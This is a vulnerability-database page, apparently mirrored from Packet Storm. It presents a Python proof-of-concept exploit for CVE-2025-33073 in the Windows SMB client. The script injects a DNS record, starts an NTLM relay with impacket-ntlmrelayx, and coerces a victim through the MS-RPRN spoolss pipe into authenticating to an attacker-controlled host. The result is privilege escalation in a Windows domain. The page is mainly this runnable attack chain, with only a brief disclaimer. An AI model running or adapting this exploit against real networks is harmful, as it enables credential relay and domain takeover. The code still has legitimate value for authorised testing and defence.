Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Microsoft Windows 11 SMB Client Privilege Escalation / Remote Code Execution

🗓️ 17 Jun 2025 00:00:00Reported by Mohammed Idrees BanyamerType 
packetstorm
 packetstorm🔗 packetstorm.news👁 94 Views

Windows eleven SMB client exploit enables privilege escalation via DNS injection and NTLM relay.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Improper Access Control in Microsoft
13 Jun 202512:15
githubexploit
GithubExploit		Exploit for Improper Access Control in Microsoft
10 Dec 202503:46
githubexploit
Information Security Automation		July “In the Trend of VM” (#17): vulnerabilities in Microsoft Windows and Roundcube
21 Jul 202516:30
avleonov
Information Security Automation		About Elevation of Privilege – Windows SMB Client (CVE-2025-33073) vulnerability
13 Jul 202512:26
avleonov
Information Security Automation		June Microsoft Patch Tuesday
10 Jun 202521:49
avleonov
Circl		CVE-2025-33073
10 Jun 202513:15
circl
CISA KEV Catalog		Microsoft Windows SMB Client Improper Access Control Vulnerability
20 Oct 202500:00
cisa_kev
CISA		 CISA Adds Five Known Exploited Vulnerabilities to Catalog
20 Oct 202512:00
cisa
CNNVD		Microsoft Windows SMB Server 访问控制错误漏洞
10 Jun 202500:00
cnnvd
CVE		CVE-2025-33073
10 Jun 202517:02
cve
Rows per page
#!/usr/bin/env python3
    # Exploit Title:  Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
    # Author: Mohammed Idrees Banyamer
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # Date: 2025-06-13
    # Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
    # CVE: CVE-2025-33073
    # Type: Remote
    # Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
    # Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
    # User Interaction: Required (authenticated domain user)
    # Remediation Level: Official Fix Available
    #
    # Affected Versions:
    # - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
    # - Windows Server 2022 (including 23H2 editions)
    # - Windows Server 2019
    # - Windows 10 versions from 1507 up to 22H2
    # - Windows Server 2016 and 2008 (with appropriate versions)
    #
    # Description:
    # This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
    # leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
    # and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
    # via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
    # Windows Server 2022, and earlier versions vulnerable to this method.
    #
    #
    # Note: The exploit requires the victim to be an authenticated domain user and the environment
    # must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
    #
    # DISCLAIMER: For authorized security testing and educational use only.
    
    import argparse
    import subprocess
    import socket
    import time
    import sys
    
    def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
        print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
        cmd = [
            "samba-tool", "dns", "add", dns_ip, dc_fqdn,
            record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
        ]
        try:
            subprocess.run(cmd, check=True)
            print("[+] DNS record successfully added.")
        except subprocess.CalledProcessError:
            print("[!] Failed to add DNS record. Check credentials and connectivity.")
            sys.exit(1)
    
    def check_record(record_name):
        print("[*] Verifying DNS record propagation...")
        for i in range(10):
            try:
                result = socket.gethostbyname_ex(record_name)
                if result and result[2]:
                    print(f"[+] DNS record resolved to: {result[2]}")
                    return True
            except socket.gaierror:
                time.sleep(2)
        print("[!] DNS record did not propagate or resolve.")
        return False
    
    def start_ntlmrelay(target):
        print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
        try:
            subprocess.Popen([
                "impacket-ntlmrelayx", "-t", target, "--no-smb-server"
            ])
            print("[*] NTLM relay server started.")
        except Exception as e:
            print(f"[!] Failed to start NTLM relay server: {e}")
            sys.exit(1)
    
    def trigger_coercion(victim_ip, fake_host):
        print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
        cmd = [
            "rpcping",
            "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
            "-s", fake_host,
            "-e", "1234",
            "-a", "n",
            "-u", "none",
            "-p", "none"
        ]
        try:
            subprocess.run(cmd, check=True)
            print("[+] Coercion RPC call sent successfully.")
        except subprocess.CalledProcessError:
            print("[!] RPC coercion failed. Verify victim connectivity and service status.")
            sys.exit(1)
    
    def main():
        parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
        parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
        parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
        parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
        parser.add_argument("--target", required=True, help="Target system to relay authentication to")
        parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
        args = parser.parse_args()
    
        record = "relaytrigger"
        fqdn = f"{record}.{args.dc_fqdn}"
    
        inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
        if not check_record(fqdn):
            print("[!] DNS verification failed, aborting.")
            sys.exit(1)
    
        start_ntlmrelay(args.target)
        time.sleep(5)  # Wait for relay server to be ready
    
        trigger_coercion(args.victim_ip, fqdn)
    
        print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jun 2025 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.8
EPSS0.37158
SSVC
windows elevensmb clientprivilege escalationremote code executiondns injectionntlm relay
94